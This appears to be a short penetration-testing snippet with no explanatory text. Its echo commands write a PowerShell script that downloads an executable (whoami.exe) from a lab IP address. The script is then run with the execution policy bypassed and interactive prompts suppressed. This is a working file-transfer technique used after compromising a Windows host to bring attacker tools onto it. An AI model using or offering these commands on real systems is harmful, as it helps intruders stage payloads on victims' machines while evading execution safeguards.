echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.56.111/whoami.exe" >>wget.ps1
echo $file = "whoami.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1



#########################################################################################
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1#
#########################################################################################
